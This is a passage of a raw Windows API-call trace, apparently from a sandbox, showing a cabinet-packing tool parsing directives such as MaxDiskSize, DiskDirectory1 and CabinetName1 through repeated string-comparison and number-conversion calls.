[0254.516] _strcmpi (_Str1="InfWriteDisk", _Str2="set") returned -10 [0254.516] _strcmpi (_Str1="New", _Str2="set") returned -5 [0254.516] _strcmpi (_Str1="Option", _Str2="set") returned -4 [0254.516] _strcmpi (_Str1="Set", _Str2="set") returned 0 [0254.516] strspn (_Str=" MaxDiskSize=0", _Control=" \x09") returned 0x1 [0254.516] strpbrk (_Str="MaxDiskSize=0", _Control="= \x09") returned="=0" [0254.516] strspn (_Str="=0", _Control=" \x09") returned 0x0 [0254.516] strspn (_Str="0", _Control=" \x09") returned 0x0 [0254.516] strpbrk (_Str="0", _Control=" \x09") returned 0x0 [0254.516] strspn (_Str="", _Control=" \x09") returned 0x0 [0254.516] _strcmpi (_Str1="", _Str2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\1A70.bin") returned -99 [0254.516] atoi (_Str="1: %2 lines)") returned 1 [0254.516] atoi (_Str="2 lines)") returned 2 [0254.516] _vsnprintf (in: _DstBuf=0x27e87fd620, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fd588 | out: _DstBuf="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\1A70.bin") returned 45 [0254.516] _vsnprintf (in: _DstBuf=0x27e87fd64f, _MaxCount=0x1d0, _Format="%d", _ArgList=0x27e87fd588 | out: _DstBuf="1") returned 1 [0254.516] atoi (_Str="1: %2 lines)") returned 1 [0254.516] atoi (_Str="2 lines)") returned 2 [0254.517] printf (_Format="%s%s\r") returned 76 [0254.561] _strcmpi (_Str1="0", _Str2="360K") returned -3 [0254.561] atol (_Str="362496") returned 362496 [0254.561] atol (_Str="0") returned 0 [0254.561] _strcmpi (_Str1="0", _Str2="720K") returned -7 [0254.561] atol (_Str="730112") returned 730112 [0254.561] atol (_Str="0") returned 0 [0254.561] _strcmpi (_Str1="0", _Str2="1.2M") returned -1 [0254.561] atol (_Str="1213952") returned 1213952 [0254.561] atol (_Str="0") returned 0 [0254.561] _strcmpi (_Str1="0", _Str2="1.25M") returned -1 [0254.561] atol (_Str="1250304") returned 1250304 [0254.561] atol (_Str="0") returned 0 [0254.561] _strcmpi (_Str1="0", _Str2="1.44M") returned -1 [0254.561] atol (_Str="1457664") returned 1457664 [0254.561] atol (_Str="0") returned 0 [0254.561] _strcmpi (_Str1="0", _Str2="1.68M") returned -1 [0254.561] atol (_Str="1716224") returned 1716224 [0254.561] atol (_Str="0") returned 0 [0254.561] _strcmpi (_Str1="0", _Str2="DMF168") returned -52 [0254.561] atol (_Str="1716224") returned 1716224 [0254.561] atol (_Str="0") returned 0 [0254.561] _strcmpi (_Str1="0", _Str2="CDROM") returned -51 [0254.561] atol (_Str="681984000") returned 681984000 [0254.562] atol (_Str="0") returned 0 [0254.562] _strcmpi (_Str1="Cabinet", _Str2="MaxDiskSize") returned -10 [0254.562] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="MaxDiskSize") returned -10 [0254.562] _strcmpi (_Str1="CabinetNameTemplate", _Str2="MaxDiskSize") returned -10 [0254.562] _strcmpi (_Str1="ChecksumWidth", _Str2="MaxDiskSize") returned -10 [0254.562] _strcmpi (_Str1="ClusterSize", _Str2="MaxDiskSize") returned -10 [0254.562] _strcmpi (_Str1="Compress", _Str2="MaxDiskSize") returned -10 [0254.562] _strcmpi (_Str1="LongSourceFileNames", _Str2="MaxDiskSize") returned -1 [0254.562] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="MaxDiskSize") returned -10 [0254.562] _strcmpi (_Str1="CompressionType", _Str2="MaxDiskSize") returned -10 [0254.562] _strcmpi (_Str1="CompressionLevel", _Str2="MaxDiskSize") returned -10 [0254.562] _strcmpi (_Str1="CompressionMemory", _Str2="MaxDiskSize") returned -10 [0254.562] _strcmpi (_Str1="DestinationDir", _Str2="MaxDiskSize") returned -9 [0254.562] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="MaxDiskSize") returned -9 [0254.562] _strcmpi (_Str1="DiskLabelTemplate", _Str2="MaxDiskSize") returned -9 [0254.562] _strcmpi (_Str1="DoNotCopyFiles", _Str2="MaxDiskSize") returned -9 [0254.562] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="MaxDiskSize") returned -7 [0254.562] _strcmpi (_Str1="FolderSizeThreshold", _Str2="MaxDiskSize") returned -7 [0254.562] _strcmpi (_Str1="GenerateInf", _Str2="MaxDiskSize") returned -6 [0254.562] _strcmpi (_Str1="InfCabinetHeader", _Str2="MaxDiskSize") returned -4 [0254.562] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="MaxDiskSize") returned -4 [0254.562] _strcmpi (_Str1="InfCommentString", _Str2="MaxDiskSize") returned -4 [0254.562] _strcmpi (_Str1="InfDateFormat", _Str2="MaxDiskSize") returned -4 [0254.562] _strcmpi (_Str1="InfDiskHeader", _Str2="MaxDiskSize") returned -4 [0254.562] _strcmpi (_Str1="InfDiskLineFormat", _Str2="MaxDiskSize") returned -4 [0254.562] _strcmpi (_Str1="InfFileHeader", _Str2="MaxDiskSize") returned -4 [0254.562] _strcmpi (_Str1="InfFileLineFormat", _Str2="MaxDiskSize") returned -4 [0254.562] _strcmpi (_Str1="InfFileName", _Str2="MaxDiskSize") returned -4 [0254.562] _strcmpi (_Str1="InfFooter", _Str2="MaxDiskSize") returned -4 [0254.562] _strcmpi (_Str1="InfFooter1", _Str2="MaxDiskSize") returned -4 [0254.562] _strcmpi (_Str1="InfFooter2", _Str2="MaxDiskSize") returned -4 [0254.562] _strcmpi (_Str1="InfFooter3", _Str2="MaxDiskSize") returned -4 [0254.562] _strcmpi (_Str1="InfFooter4", _Str2="MaxDiskSize") returned -4 [0254.562] _strcmpi (_Str1="InfHeader", _Str2="MaxDiskSize") returned -4 [0254.563] _strcmpi (_Str1="InfHeader1", _Str2="MaxDiskSize") returned -4 [0254.563] _strcmpi (_Str1="InfHeader2", _Str2="MaxDiskSize") returned -4 [0254.563] _strcmpi (_Str1="InfHeader3", _Str2="MaxDiskSize") returned -4 [0254.566] _strcmpi (_Str1="InfHeader4", _Str2="MaxDiskSize") returned -4 [0254.566] _strcmpi (_Str1="InfHeader5", _Str2="MaxDiskSize") returned -4 [0254.566] _strcmpi (_Str1="InfHeader6", _Str2="MaxDiskSize") returned -4 [0254.566] _strcmpi (_Str1="InfSectionOrder", _Str2="MaxDiskSize") returned -4 [0254.566] _strcmpi (_Str1="MaxCabinetSize", _Str2="MaxDiskSize") returned -1 [0254.566] _strcmpi (_Str1="MaxDiskFileCount", _Str2="MaxDiskSize") returned -13 [0254.566] _strcmpi (_Str1="MaxDiskSize", _Str2="MaxDiskSize") returned 0 [0254.566] _strcmpi (_Str1="0", _Str2="360K") returned -3 [0254.566] atol (_Str="362496") returned 362496 [0254.566] atol (_Str="0") returned 0 [0254.566] _strcmpi (_Str1="0", _Str2="720K") returned -7 [0254.566] atol (_Str="730112") returned 730112 [0254.566] atol (_Str="0") returned 0 [0254.566] _strcmpi (_Str1="0", _Str2="1.2M") returned -1 [0254.566] atol (_Str="1213952") returned 1213952 [0254.566] atol (_Str="0") returned 0 [0254.566] _strcmpi (_Str1="0", _Str2="1.25M") returned -1 [0254.566] atol (_Str="1250304") returned 1250304 [0254.566] atol (_Str="0") returned 0 [0254.566] _strcmpi (_Str1="0", _Str2="1.44M") returned -1 [0254.566] atol (_Str="1457664") returned 1457664 [0254.567] atol (_Str="0") returned 0 [0254.567] _strcmpi (_Str1="0", _Str2="1.68M") returned -1 [0254.567] atol (_Str="1716224") returned 1716224 [0254.567] atol (_Str="0") returned 0 [0254.567] _strcmpi (_Str1="0", _Str2="DMF168") returned -52 [0254.567] atol (_Str="1716224") returned 1716224 [0254.567] atol (_Str="0") returned 0 [0254.567] _strcmpi (_Str1="0", _Str2="CDROM") returned -51 [0254.567] atol (_Str="681984000") returned 681984000 [0254.567] atol (_Str="0") returned 0 [0254.567] _strcmpi (_Str1="MaxDiskSize", _Str2="MaxDiskSize") returned 0 [0254.567] _strcmpi (_Str1="0", _Str2="360K") returned -3 [0254.567] atol (_Str="362496") returned 362496 [0254.567] atol (_Str="0") returned 0 [0254.567] _strcmpi (_Str1="0", _Str2="720K") returned -7 [0254.567] atol (_Str="730112") returned 730112 [0254.567] atol (_Str="0") returned 0 [0254.567] _strcmpi (_Str1="0", _Str2="1.2M") returned -1 [0254.567] atol (_Str="1213952") returned 1213952 [0254.567] atol (_Str="0") returned 0 [0254.567] _strcmpi (_Str1="0", _Str2="1.25M") returned -1 [0254.567] atol (_Str="1250304") returned 1250304 [0254.567] atol (_Str="0") returned 0 [0254.567] _strcmpi (_Str1="0", _Str2="1.44M") returned -1 [0254.567] atol (_Str="1457664") returned 1457664 [0254.567] atol (_Str="0") returned 0 [0254.567] _strcmpi (_Str1="0", _Str2="1.68M") returned -1 [0254.567] atol (_Str="1716224") returned 1716224 [0254.567] atol (_Str="0") returned 0 [0254.567] _strcmpi (_Str1="0", _Str2="DMF168") returned -52 [0254.568] atol (_Str="1716224") returned 1716224 [0254.568] atol (_Str="0") returned 0 [0254.568] _strcmpi (_Str1="0", _Str2="CDROM") returned -51 [0254.568] atol (_Str="681984000") returned 681984000 [0254.568] atol (_Str="0") returned 0 [0254.568] strpbrk (_Str=".set DiskDirectory1=\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\"", _Control=" \x09") returned=" DiskDirectory1=\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\"" [0254.568] strspn (_Str=" DiskDirectory1=\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\"", _Control=" \x09") returned 0x1 [0254.568] strpbrk (_Str="DiskDirectory1=\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\"", _Control=" \x09") returned 0x0 [0254.568] strspn (_Str=".set DiskDirectory1=\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\"", _Control=" \x09") returned 0x0 [0254.568] strspn (_Str=".set DiskDirectory1=\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\"", _Control=" \x09") returned 0x0 [0254.568] strpbrk (_Str="set DiskDirectory1=\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\"", _Control=" \x09") returned=" DiskDirectory1=\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\"" [0254.568] _strcmpi (_Str1="Define", _Str2="set") returned -15 [0254.568] _strcmpi (_Str1="Delete", _Str2="set") returned -15 [0254.568] _strcmpi (_Str1="Dump", _Str2="set") returned -15 [0254.568] _strcmpi (_Str1="InfBegin", _Str2="set") returned -10 [0254.568] _strcmpi (_Str1="InfEnd", _Str2="set") returned -10 [0254.568] _strcmpi (_Str1="InfWrite", _Str2="set") returned -10 [0254.568] _strcmpi (_Str1="InfWriteCabinet", _Str2="set") returned -10 [0254.568] _strcmpi (_Str1="InfWriteDisk", _Str2="set") returned -10 [0254.568] _strcmpi (_Str1="New", _Str2="set") returned -5 [0254.568] _strcmpi (_Str1="Option", _Str2="set") returned -4 [0254.568] _strcmpi (_Str1="Set", _Str2="set") returned 0 [0254.568] strspn (_Str=" DiskDirectory1=\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\"", _Control=" \x09") returned 0x1 [0254.568] strpbrk (_Str="DiskDirectory1=\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\"", _Control="= \x09") returned="=\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\"" [0254.568] strspn (_Str="=\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\"", _Control=" \x09") returned 0x0 [0254.568] strspn (_Str="\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\"", _Control=" \x09") returned 0x0 [0254.568] strspn (_Str="", _Control=" \x09") returned 0x0 [0254.568] _strcmpi (_Str1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\1A70.bin", _Str2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\1A70.bin") returned 0 [0254.568] _strcmpi (_Str1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp", _Str2="360K") returned 48 [0254.568] atol (_Str="362496") returned 362496 [0254.568] atol (_Str="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned 0 [0254.568] _strcmpi (_Str1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp", _Str2="720K") returned 44 [0254.568] atol (_Str="730112") returned 730112 [0254.568] atol (_Str="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned 0 [0254.568] _strcmpi (_Str1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp", _Str2="1.2M") returned 50 [0254.569] atol (_Str="1213952") returned 1213952 [0254.569] atol (_Str="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned 0 [0254.569] _strcmpi (_Str1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp", _Str2="1.25M") returned 50 [0254.569] atol (_Str="1250304") returned 1250304 [0254.569] atol (_Str="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned 0 [0254.569] _strcmpi (_Str1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp", _Str2="1.44M") returned 50 [0254.569] atol (_Str="1457664") returned 1457664 [0254.569] atol (_Str="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned 0 [0254.569] _strcmpi (_Str1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp", _Str2="1.68M") returned 50 [0254.569] atol (_Str="1716224") returned 1716224 [0254.569] atol (_Str="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned 0 [0254.569] _strcmpi (_Str1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp", _Str2="DMF168") returned -1 [0254.569] atol (_Str="1716224") returned 1716224 [0254.569] atol (_Str="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned 0 [0254.569] _strcmpi (_Str1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp", _Str2="CDROM") returned -42 [0254.569] atol (_Str="681984000") returned 681984000 [0254.569] atol (_Str="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned 0 [0254.569] _strcmpi (_Str1="Cabinet", _Str2="DiskDirectory1") returned -1 [0254.569] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="DiskDirectory1") returned -1 [0254.569] _strcmpi (_Str1="CabinetNameTemplate", _Str2="DiskDirectory1") returned -1 [0254.569] _strcmpi (_Str1="ChecksumWidth", _Str2="DiskDirectory1") returned -1 [0254.569] _strcmpi (_Str1="ClusterSize", _Str2="DiskDirectory1") returned -1 [0254.569] _strcmpi (_Str1="Compress", _Str2="DiskDirectory1") returned -1 [0254.569] _strcmpi (_Str1="LongSourceFileNames", _Str2="DiskDirectory1") returned 8 [0254.569] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="DiskDirectory1") returned -1 [0254.569] _strcmpi (_Str1="CompressionType", _Str2="DiskDirectory1") returned -1 [0254.569] _strcmpi (_Str1="CompressionLevel", _Str2="DiskDirectory1") returned -1 [0254.569] _strcmpi (_Str1="CompressionMemory", _Str2="DiskDirectory1") returned -1 [0254.569] _strcmpi (_Str1="DestinationDir", _Str2="DiskDirectory1") returned -4 [0254.569] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="DiskDirectory1") returned 67 [0254.569] _strcmpi (_Str1="DiskLabelTemplate", _Str2="DiskDirectory1") returned 8 [0254.569] _strcmpi (_Str1="DoNotCopyFiles", _Str2="DiskDirectory1") returned 6 [0254.569] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="DiskDirectory1") returned 2 [0254.569] _strcmpi (_Str1="FolderSizeThreshold", _Str2="DiskDirectory1") returned 2 [0254.569] _strcmpi (_Str1="GenerateInf", _Str2="DiskDirectory1") returned 3 [0254.569] _strcmpi (_Str1="InfCabinetHeader", _Str2="DiskDirectory1") returned 5 [0254.569] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="DiskDirectory1") returned 5 [0254.569] _strcmpi (_Str1="InfCommentString", _Str2="DiskDirectory1") returned 5 [0254.569] _strcmpi (_Str1="InfDateFormat", _Str2="DiskDirectory1") returned 5 [0254.569] _strcmpi (_Str1="InfDiskHeader", _Str2="DiskDirectory1") returned 5 [0254.570] _strcmpi (_Str1="InfDiskLineFormat", _Str2="DiskDirectory1") returned 5 [0254.570] _strcmpi (_Str1="InfFileHeader", _Str2="DiskDirectory1") returned 5 [0254.570] _strcmpi (_Str1="InfFileLineFormat", _Str2="DiskDirectory1") returned 5 [0254.570] _strcmpi (_Str1="InfFileName", _Str2="DiskDirectory1") returned 5 [0254.570] _strcmpi (_Str1="InfFooter", _Str2="DiskDirectory1") returned 5 [0254.570] _strcmpi (_Str1="InfFooter1", _Str2="DiskDirectory1") returned 5 [0254.570] _strcmpi (_Str1="InfFooter2", _Str2="DiskDirectory1") returned 5 [0254.570] _strcmpi (_Str1="InfFooter3", _Str2="DiskDirectory1") returned 5 [0254.570] _strcmpi (_Str1="InfFooter4", _Str2="DiskDirectory1") returned 5 [0254.570] _strcmpi (_Str1="InfHeader", _Str2="DiskDirectory1") returned 5 [0254.570] _strcmpi (_Str1="InfHeader1", _Str2="DiskDirectory1") returned 5 [0254.570] _strcmpi (_Str1="InfHeader2", _Str2="DiskDirectory1") returned 5 [0254.570] _strcmpi (_Str1="InfHeader3", _Str2="DiskDirectory1") returned 5 [0254.570] _strcmpi (_Str1="InfHeader4", _Str2="DiskDirectory1") returned 5 [0254.570] _strcmpi (_Str1="InfHeader5", _Str2="DiskDirectory1") returned 5 [0254.570] _strcmpi (_Str1="InfHeader6", _Str2="DiskDirectory1") returned 5 [0254.570] _strcmpi (_Str1="InfSectionOrder", _Str2="DiskDirectory1") returned 5 [0254.570] _strcmpi (_Str1="MaxCabinetSize", _Str2="DiskDirectory1") returned 9 [0254.570] _strcmpi (_Str1="MaxDiskFileCount", _Str2="DiskDirectory1") returned 9 [0254.570] _strcmpi (_Str1="MaxDiskSize", _Str2="DiskDirectory1") returned 9 [0254.570] _strcmpi (_Str1="MaxErrors", _Str2="DiskDirectory1") returned 9 [0254.570] _strcmpi (_Str1="ReservePerCabinetSize", _Str2="DiskDirectory1") returned 14 [0254.570] _strcmpi (_Str1="ReservePerDataBlockSize", _Str2="DiskDirectory1") returned 14 [0254.570] _strcmpi (_Str1="ReservePerFolderSize", _Str2="DiskDirectory1") returned 14 [0254.570] _strcmpi (_Str1="RptFileName", _Str2="DiskDirectory1") returned 14 [0254.570] _strcmpi (_Str1="SourceDir", _Str2="DiskDirectory1") returned 15 [0254.570] _strcmpi (_Str1="UniqueFiles", _Str2="DiskDirectory1") returned 17 [0254.570] atoi (_Str="1") returned 1 [0254.570] _vsnprintf (in: _DstBuf=0x27e87fd500, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fd468 | out: _DstBuf="DiskDirectory1") returned 14 [0254.570] atoi (_Str="1") returned 1 [0254.570] _strcmpi (_Str1="Cabinet", _Str2="DiskDirectory1") returned -1 [0254.570] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="DiskDirectory1") returned -1 [0254.570] _strcmpi (_Str1="CabinetNameTemplate", _Str2="DiskDirectory1") returned -1 [0254.570] _strcmpi (_Str1="ChecksumWidth", _Str2="DiskDirectory1") returned -1 [0254.570] _strcmpi (_Str1="ClusterSize", _Str2="DiskDirectory1") returned -1 [0254.570] _strcmpi (_Str1="Compress", _Str2="DiskDirectory1") returned -1 [0254.571] _strcmpi (_Str1="LongSourceFileNames", _Str2="DiskDirectory1") returned 8 [0254.571] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="DiskDirectory1") returned -1 [0254.571] _strcmpi (_Str1="CompressionType", _Str2="DiskDirectory1") returned -1 [0254.571] _strcmpi (_Str1="CompressionLevel", _Str2="DiskDirectory1") returned -1 [0254.571] _strcmpi (_Str1="CompressionMemory", _Str2="DiskDirectory1") returned -1 [0254.571] _strcmpi (_Str1="DestinationDir", _Str2="DiskDirectory1") returned -4 [0254.571] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="DiskDirectory1") returned 67 [0254.571] _strcmpi (_Str1="DiskLabelTemplate", _Str2="DiskDirectory1") returned 8 [0254.571] _strcmpi (_Str1="DoNotCopyFiles", _Str2="DiskDirectory1") returned 6 [0254.571] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="DiskDirectory1") returned 2 [0254.571] _strcmpi (_Str1="FolderSizeThreshold", _Str2="DiskDirectory1") returned 2 [0254.571] _strcmpi (_Str1="GenerateInf", _Str2="DiskDirectory1") returned 3 [0254.571] _strcmpi (_Str1="InfCabinetHeader", _Str2="DiskDirectory1") returned 5 [0254.571] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="DiskDirectory1") returned 5 [0254.571] _strcmpi (_Str1="InfCommentString", _Str2="DiskDirectory1") returned 5 [0254.571] _strcmpi (_Str1="InfDateFormat", _Str2="DiskDirectory1") returned 5 [0254.571] _strcmpi (_Str1="InfDiskHeader", _Str2="DiskDirectory1") returned 5 [0254.571] _strcmpi (_Str1="InfDiskLineFormat", _Str2="DiskDirectory1") returned 5 [0254.571] _strcmpi (_Str1="InfFileHeader", _Str2="DiskDirectory1") returned 5 [0254.571] _strcmpi (_Str1="InfFileLineFormat", _Str2="DiskDirectory1") returned 5 [0254.571] _strcmpi (_Str1="InfFileName", _Str2="DiskDirectory1") returned 5 [0254.571] _strcmpi (_Str1="InfFooter", _Str2="DiskDirectory1") returned 5 [0254.571] _strcmpi (_Str1="InfFooter1", _Str2="DiskDirectory1") returned 5 [0254.571] _strcmpi (_Str1="InfFooter2", _Str2="DiskDirectory1") returned 5 [0254.571] _strcmpi (_Str1="InfFooter3", _Str2="DiskDirectory1") returned 5 [0254.572] _strcmpi (_Str1="InfFooter4", _Str2="DiskDirectory1") returned 5 [0254.572] _strcmpi (_Str1="InfHeader", _Str2="DiskDirectory1") returned 5 [0254.572] _strcmpi (_Str1="InfHeader1", _Str2="DiskDirectory1") returned 5 [0254.572] _strcmpi (_Str1="InfHeader2", _Str2="DiskDirectory1") returned 5 [0254.572] _strcmpi (_Str1="InfHeader3", _Str2="DiskDirectory1") returned 5 [0254.572] _strcmpi (_Str1="InfHeader4", _Str2="DiskDirectory1") returned 5 [0254.572] _strcmpi (_Str1="InfHeader5", _Str2="DiskDirectory1") returned 5 [0254.572] _strcmpi (_Str1="InfHeader6", _Str2="DiskDirectory1") returned 5 [0254.572] _strcmpi (_Str1="InfSectionOrder", _Str2="DiskDirectory1") returned 5 [0254.572] _strcmpi (_Str1="MaxCabinetSize", _Str2="DiskDirectory1") returned 9 [0254.572] _strcmpi (_Str1="MaxDiskFileCount", _Str2="DiskDirectory1") returned 9 [0254.572] _strcmpi (_Str1="MaxDiskSize", _Str2="DiskDirectory1") returned 9 [0254.572] _strcmpi (_Str1="MaxErrors", _Str2="DiskDirectory1") returned 9 [0254.572] _strcmpi (_Str1="ReservePerCabinetSize", _Str2="DiskDirectory1") returned 14 [0254.572] _strcmpi (_Str1="ReservePerDataBlockSize", _Str2="DiskDirectory1") returned 14 [0254.572] _strcmpi (_Str1="ReservePerFolderSize", _Str2="DiskDirectory1") returned 14 [0254.572] _strcmpi (_Str1="RptFileName", _Str2="DiskDirectory1") returned 14 [0254.572] _strcmpi (_Str1="SourceDir", _Str2="DiskDirectory1") returned 15 [0254.572] _strcmpi (_Str1="UniqueFiles", _Str2="DiskDirectory1") returned 17 [0254.572] atoi (_Str="1") returned 1 [0254.572] _vsnprintf (in: _DstBuf=0x27e87fd290, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fd1f8 | out: _DstBuf="DiskDirectory1") returned 14 [0254.572] atoi (_Str="1") returned 1 [0254.572] _strcmpi (_Str1="DiskDirectory1", _Str2="MaxDiskSize") returned -9 [0254.572] _strcmpi (_Str1="DiskDirectory1", _Str2="GenerateInf") returned -3 [0254.572] strpbrk (_Str=".set CabinetName1=\"2314.bin\"", _Control=" \x09") returned=" CabinetName1=\"2314.bin\"" [0254.573] strspn (_Str=" CabinetName1=\"2314.bin\"", _Control=" \x09") returned 0x1 [0254.573] strpbrk (_Str="CabinetName1=\"2314.bin\"", _Control=" \x09") returned 0x0 [0254.573] strspn (_Str=".set CabinetName1=\"2314.bin\"", _Control=" \x09") returned 0x0 [0254.573] strspn (_Str=".set CabinetName1=\"2314.bin\"", _Control=" \x09") returned 0x0 [0254.573] strpbrk (_Str="set CabinetName1=\"2314.bin\"", _Control=" \x09") returned=" CabinetName1=\"2314.bin\"" [0254.573] _strcmpi (_Str1="Define", _Str2="set") returned -15 [0254.573] _strcmpi (_Str1="Delete", _Str2="set") returned -15 [0254.573] _strcmpi (_Str1="Dump", _Str2="set") returned -15 [0254.573] _strcmpi (_Str1="InfBegin", _Str2="set") returned -10 [0254.573] _strcmpi (_Str1="InfEnd", _Str2="set") returned -10 [0254.573] _strcmpi (_Str1="InfWrite", _Str2="set") returned -10 [0254.573] _strcmpi (_Str1="InfWriteCabinet", _Str2="set") returned -10 [0254.573] _strcmpi (_Str1="InfWriteDisk", _Str2="set") returned -10 [0254.573] _strcmpi (_Str1="New", _Str2="set") returned -5 [0254.573] _strcmpi (_Str1="Option", _Str2="set") returned -4 [0254.573] _strcmpi (_Str1="Set", _Str2="set") returned 0 [0254.573] strspn (_Str=" CabinetName1=\"2314.bin\"", _Control=" \x09") returned 0x1 [0254.573] strpbrk (_Str="CabinetName1=\"2314.bin\"", _Control="= \x09") returned="=\"2314.bin\"" [0254.573] strspn (_Str="=\"2314.bin\"", _Control=" \x09") returned 0x0 [0254.573] strspn (_Str="\"2314.bin\"", _Control=" \x09") returned 0x0 [0254.573] strspn (_Str="", _Control=" \x09") returned 0x0 [0254.573] _strcmpi (_Str1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\1A70.bin", _Str2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\1A70.bin") returned 0 [0254.573] _strcmpi (_Str1="2314.bin", _Str2="360K") returned -1 [0254.573] atol (_Str="362496") returned 362496 [0254.573] atol (_Str="2314.bin") returned 2314 [0254.573] _strcmpi (_Str1="2314.bin", _Str2="720K") returned -5 [0254.573] atol (_Str="730112") returned 730112 [0254.573] atol (_Str="2314.bin") returned 2314 [0254.573] _strcmpi (_Str1="2314.bin", _Str2="1.2M") returned 1 [0254.573] atol (_Str="1213952") returned 1213952 [0254.573] atol (_Str="2314.bin") returned 2314 [0254.573] _strcmpi (_Str1="2314.bin", _Str2="1.25M") returned 1 [0254.574] atol (_Str="1250304") returned 1250304 [0254.574] atol (_Str="2314.bin") returned 2314 [0254.574] _strcmpi (_Str1="2314.bin", _Str2="1.44M") returned 1 [0254.574] atol (_Str="1457664") returned 1457664 [0254.574] atol (_Str="2314.bin") returned 2314 [0254.574] _strcmpi (_Str1="2314.bin", _Str2="1.68M") returned 1 [0254.574] atol (_Str="1716224") returned 1716224 [0254.574] atol (_Str="2314.bin") returned 2314 [0254.574] _strcmpi (_Str1="2314.bin", _Str2="DMF168") returned -50 [0254.574] atol (_Str="1716224") returned 1716224 [0254.574] atol (_Str="2314.bin") returned 2314 [0254.574] _strcmpi (_Str1="2314.bin", _Str2="CDROM") returned -49 [0254.574] atol (_Str="681984000") returned 681984000 [0254.574] atol (_Str="2314.bin") returned 2314 [0254.574] _strcmpi (_Str1="Cabinet", _Str2="CabinetName1") returned -110 [0254.574] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="CabinetName1") returned -8 [0254.574] _strcmpi (_Str1="CabinetNameTemplate", _Str2="CabinetName1") returned 67 [0254.574] _strcmpi (_Str1="ChecksumWidth", _Str2="CabinetName1") returned 7 [0254.574] _strcmpi (_Str1="ClusterSize", _Str2="CabinetName1") returned 11 [0254.574] _strcmpi (_Str1="Compress", _Str2="CabinetName1") returned 14 [0254.574] _strcmpi (_Str1="LongSourceFileNames", _Str2="CabinetName1") returned 9 [0254.574] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="CabinetName1") returned 14 [0254.574] _strcmpi (_Str1="CompressionType", _Str2="CabinetName1") returned 14 [0254.574] _strcmpi (_Str1="CompressionLevel", _Str2="CabinetName1") returned 14 [0254.574] _strcmpi (_Str1="CompressionMemory", _Str2="CabinetName1") returned 14 [0254.574] _strcmpi (_Str1="DestinationDir", _Str2="CabinetName1") returned 1 [0254.574] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="CabinetName1") returned 1 [0254.574] _strcmpi (_Str1="DiskLabelTemplate", _Str2="CabinetName1") returned 1 [0254.574] _strcmpi (_Str1="DoNotCopyFiles", _Str2="CabinetName1") returned 1 [0254.574] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="CabinetName1") returned 3 [0254.574] _strcmpi (_Str1="FolderSizeThreshold", _Str2="CabinetName1") returned 3 [0254.574] _strcmpi (_Str1="GenerateInf", _Str2="CabinetName1") returned 4 [0254.574] _strcmpi (_Str1="InfCabinetHeader", _Str2="CabinetName1") returned 6 [0254.574] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="CabinetName1") returned 6 [0254.574] _strcmpi (_Str1="InfCommentString", _Str2="CabinetName1") returned 6 [0254.575] _strcmpi (_Str1="InfDateFormat", _Str2="CabinetName1") returned 6 [0254.575] _strcmpi (_Str1="InfDiskHeader", _Str2="CabinetName1") returned 6 [0254.575] _strcmpi (_Str1="InfDiskLineFormat", _Str2="CabinetName1") returned 6 [0254.575] _strcmpi (_Str1="InfFileHeader", _Str2="CabinetName1") returned 6 [0254.575] _strcmpi (_Str1="InfFileLineFormat", _Str2="CabinetName1") returned 6 [0254.575] _strcmpi (_Str1="InfFileName", _Str2="CabinetName1") returned 6 [0254.575] _strcmpi (_Str1="InfFooter", _Str2="CabinetName1") returned 6 [0254.575] _strcmpi 